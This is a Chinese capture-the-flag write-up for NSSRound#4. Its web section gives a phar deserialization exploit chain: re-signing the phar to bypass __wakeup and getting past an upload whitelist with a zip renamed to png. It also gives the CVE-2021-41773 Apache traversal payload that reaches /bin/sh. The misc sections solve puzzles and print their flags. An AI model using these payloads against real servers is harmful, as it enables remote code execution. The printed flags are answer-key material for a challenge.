[NSSRound#4] 复现

目录

Web

1zweb

1zweb(revenge)

 ez_rce

MISC

 Signin

Pixel_Signin

Knight's Tour!

Type Message

---

Web

1zweb

直接能非预期读出来flag 

1zweb(revenge)

就是上题的预期解

文件上传、反序列化、PHP伪协议

index.php

ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

file_get_content可以触发phar反序列化，只需绕过__wakeup即可

startBuffering();
$phar->setStub(""); //设置stub

$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

由于需要绕过wakeup，因为是后面自己去改的数据，而phar文件的签名是第一次生成文件的时候自动生成的，所以当我们修改数据过后，由于签名错误，这个phar是无法被正常解析的，所以需要修改签名，让他变成一个正常的phar文件还需要对phar文件进行修改 

from hashlib import sha1

file = open('poc.phar', 'rb').read() # 需要重新生成签名的phar文件

data = file[:-28] # 获取需要签名的数据

final = file[-8:] # 获取最后8位GBMB标识和签名类型

newfile = data+sha1(data).digest()+final # 数据 + 签名 + 类型 + GBMB

open('newpoc.phar', 'wb').write(newfile) # 写入到新的phar文件

upload.php

 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}

这里对文件后后缀进行了白名单，也对phar文件内容进行了检测，伪了绕过这两点

将文件压缩为zip文件，并把后缀改为png文件，这样文件内容和后缀白名单检测都绕过了

我们可以使用phar伪协议

file=phar://./upload/123.png/newpoc.phar 

 ez_rce

CVE-2021-41773

 Apache2.4.49 有目录穿越漏洞

如果服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

 这里制造了一个文件夹迷宫，四层（靠经验和尝试了）

集束炸弹爆破出路径 四个变量都0~9

 

 

MISC

 Signin

给了一个dockerfile

导入了一个hggg/flag:v0镜像，然后将镜像中FLAG环境变量的数据写入了flag.txt文件之中。
通过DockerHub查看镜像的细节：

 在操作历史中，就可以看到对FLAG这个环境变量的操作历史

Pixel_Signin

提取像素点数据 31*31 

from PIL import Image
result = open('1.txt','w+')
img = Image.open("Pixel_Signin.png")
img = img.convert('RGB')
for i in range(31):
    for j in range(31):
        r,g,b = img.getpixel((j,i))
        print(r,g,b,file=result)

得到的数据都是在ASCII可见字符范围内 ，拿取转ASCII 

 这串数据 凯撒或rot13

NSSCTF{Haruki_is_NSS_SUPERMAN_so_this_task_is_easy} 

Knight's Tour!

zip打不开，是把zip文件头换成rar了，换回去 

下面组成的话和题目都指向 Knight‘s Tour ，一个棋类游戏 

 可以看到下面的句子跟原棋盘数量一样，也就是我们要给原棋盘涂色，玩完之后能组成下面的句子并且颜色相符。

 涂完之后 红黄转01二进制 ，然后ASCII

Type Message

手机键盘

 听一下音频，就是手机拨号码的声音

四个字母有信息DTMF 解密手机键盘拨号

Detect DTMF Tones

627474238133 3118161334374 7333221535393 322217493

 NSSCTF DTMFIS REALLY EASY =》 NSSCTF{DTMFISREALLYEASY}